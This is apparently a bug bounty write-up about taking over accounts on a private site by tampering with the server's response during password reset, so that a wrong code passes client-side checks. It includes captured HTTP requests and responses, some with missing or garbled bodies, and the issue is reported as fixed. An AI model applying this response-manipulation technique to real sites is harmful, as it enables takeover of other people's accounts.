Hi everyone , here is one of my write-up on account takeover via password reset functionality . As the site is private let assume as site.com
So basically the password reset functionality work flow is like below
- User requested for password reset
- Then one code(12 digit Alphanumeric ) sent to the registered Email id
- User have to provide the correct code then application ask to set new password
So lets start
to reset password user need to visit site.com/forgetpassword
the below form will appear ,
So here let say we use victim email id victim@site.com and requested for password reset
after that the below screen will appear , here we need to enter the correct code to reset the password . so the code is 12 digit so no way to brute force.
so here used some random code like "hacker" and i saw there is no validation of code length
so here is the request of code validation
_POST /memberp/users/send_reser_instruction
Content-Lenght: 67
Content-Type: application/x-www-form-urlencoded
Host: site.com
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
X-Request-With: XMLHttpRequest
Referer: site.com/forgotpassword
Cookie: bla=bla;
_method=POST&data%5Bforgotpassword%5D%5Bpassword+Reset+code%5D=hacker&data%5Bforgotpassword%5D%5Bprcemailid%5D=UkRNS2JSUlZWcEdjdmNnRE1JOWVhuXFVMWpEMWMOREZHWExaaHRGaWdyWT0==_
here is the response
_HTTP/1.1 200 OK
Date: sun,08 may 2017 10:58:07 GTM
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8
so after that i have provided the correct code to analysis the back-end validation
so for a correct code in the response body just changed like this
HTTP/1.1 200 OK
Date: sun,08 may 2017 10:58:07 GTM
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8
Content-length: 210
so as you can see it just validating the prcemailid2 value which we can get from the 1st request
_method=POST&data%5Bforgotpassword%5D%5Bpassword+Reset+code%5D=hacker&data%5Bforgotpassword%5D%5Bprcemailid%5D=UkRNS2JSUlZWcEdjdmNnRE1JOWVhuXFVMWpEMWMOREZHWExaaHR
so just in the response body you need to replace with below code
so the final response will be like this**
HTTP/1.1 200 OK
Date: sun,08 may 2017 10:58:07 GTM
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8
Content-length: 210
__
boom now the below screen appears
Now provide the new password and confirm new password and submit the request , password changed successfully . Navigate to login panel and login with new password .
successfully own the account
Status :Fixed
Bounty Rewarded